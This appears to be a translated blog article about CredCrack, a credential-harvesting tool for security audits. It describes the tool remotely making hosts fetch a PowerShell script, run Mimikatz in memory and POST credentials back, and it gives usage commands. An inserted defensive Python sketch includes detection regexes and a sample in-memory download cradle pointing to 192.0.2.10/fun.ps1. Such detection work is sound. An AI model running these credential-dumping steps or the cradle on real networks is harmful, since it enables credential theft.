Get network administrator permissions within 17 seconds
Many security auditors must obtain the permissions of the target network's administrator when conducting a security audit of that network environment. This is usually very exciting, because we know that getting network administrator permissions is just a good start. I have performed security audits on many networks, and I always spend a lot of time obtaining the permissions of the network administrator. So I decided to find a way to speed up this process.
CredCrack was born
CredCrack is written in Python. This quick and convenient tool helps researchers obtain user credentials directly from the memory of the target system; that is, it can show you the network administrator account of the target network directly.
Working Mechanism of CredCrack
If you want to use CredCrack, you must configure the environment first. It automatically enables the Apache service and deploys two files in the /var/www directory of your host. One file is fun.ps1, and the other is creds.php. In addition, security auditors also need to run a script to download Invoke-Mimikatz.ps1 and manually save the downloaded file to the same directory (/var/www).
After all these operations are completed, CredCrack verifies the list of target systems provided by the auditor to make sure that it can connect to them, that is, that port 445 is open on each target host. After this check is complete, CredCrack removes the hosts it cannot connect to from the list, and then searches the remaining target systems in the list for the account information of the network administrator.
When the program obtains the network administrator account of the host in the list, CredCrack searches all hosts in the network for the account credentials of the network administrator. It sends a raw PowerShell command to the remote host, requiring the remote host to connect to the auditor's system and to download and run the contents of the fun.ps1 file in the remote host's memory.
The fun.ps1 PowerShell script executes mimikatz in the memory of the target system and sends the user credentials to the auditor's system through a POST request.
After that, CredCrack continues searching for user credentials in the systems of the target network. If the program obtains other user credentials, it analyzes them and compares them against the network administrator account obtained previously. It compares the user name of the account to determine whether the account is the administrator account of the target network.
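A defender-side sketch of the stage described above, added here and not part of CredCrack or the original article: it flags PowerShell command lines that download a script and run it in memory, then groups the hits by the server they point to, since the tool sends the same command to every host in its list. The event format, the sample lines and the regex heuristics are constructed assumptions; fun.ps1, creds.php and Invoke-Mimikatz are the names the page mentions.

```python
import re
from collections import defaultdict

# Generic markers for "download a script and run it in memory" (assumed heuristics).
DOWNLOAD = re.compile(r"downloadstring|downloaddata|invoke-webrequest|invoke-restmethod", re.I)
IN_MEMORY = re.compile(r"\biex\b|invoke-expression", re.I)
REMOTE_PS1 = re.compile(r"https?://([^/\s'\"]+)/[^\s'\"]*\.ps1", re.I)
# File and script names taken from the page's description.
PAGE_NAMES = ("fun.ps1", "invoke-mimikatz", "creds.php")

def reasons_for(cmdline):
    """Return the reasons a process command line matches the described stage."""
    low = cmdline.lower()
    if "powershell" not in low:
        return []
    found = []
    if DOWNLOAD.search(low) and IN_MEMORY.search(low):
        found.append("download-and-execute-in-memory")
    if REMOTE_PS1.search(low):
        found.append("remote-ps1-url")
    found += ["page-name:" + name for name in PAGE_NAMES if name in low]
    return found

def fan_out(events, min_hosts=2):
    """Map each script server to the hosts that fetched a .ps1 from it,
    keeping only servers contacted by at least min_hosts distinct hosts."""
    servers = defaultdict(set)
    for ev in events:
        match = REMOTE_PS1.search(ev["cmdline"])
        if match and reasons_for(ev["cmdline"]):
            servers[match.group(1).lower()].add(ev["host"])
    return {s: sorted(h) for s, h in servers.items() if len(h) >= min_hosts}

# Constructed process-creation events (not captured from CredCrack).
CRADLE = "powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/fun.ps1')\""
SAMPLE_EVENTS = [
    {"host": "WS01", "cmdline": CRADLE},
    {"host": "WS02", "cmdline": CRADLE},
    {"host": "WS03", "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"host": "WS04", "cmdline": "cmd.exe /c ipconfig /all"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        hits = reasons_for(ev["cmdline"])
        if hits:
            print(ev["host"], hits)
    print(fan_out(SAMPLE_EVENTS))
```

The same names can be searched for in web proxy or server logs, where the page's description implies a GET for fun.ps1 followed by a POST to creds.php from each affected host.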
Obtain the network administrator account credentials within 17 seconds
CredCrack has two main functions. It uses the local administrator credentials provided by the researcher to enumerate the share permissions of the systems, and it obtains user credentials across the network. One reason for using the share enumeration function is that the program needs to verify whether a given user has write or administrator permissions on the target system. The following example shows the syntax.
./credcrack.py -d darkcove -u jblack -f hosts -es
One of the most valuable features of CredCrack is that it can obtain user credentials. The following example shows the syntax.
./credcrack.py -d darkcove -u jblack -f hosts -l 192.168.1.10
Great! Now it's time to use CredCrack. In the video below, the researcher Alton uses CredCrack and obtains the network administrator credentials for the target network within 17 seconds. By the way, he may be the fastest typist I have ever seen.
Conclusion
CredCrack is designed to help security auditors obtain the account credentials of network administrators during security audits. This program helps me a lot in the process of security audits, so I hope it can help more people too. If you use CredCrack in Kali Linux, it does not depend on anything except Invoke-Mimikatz.ps1.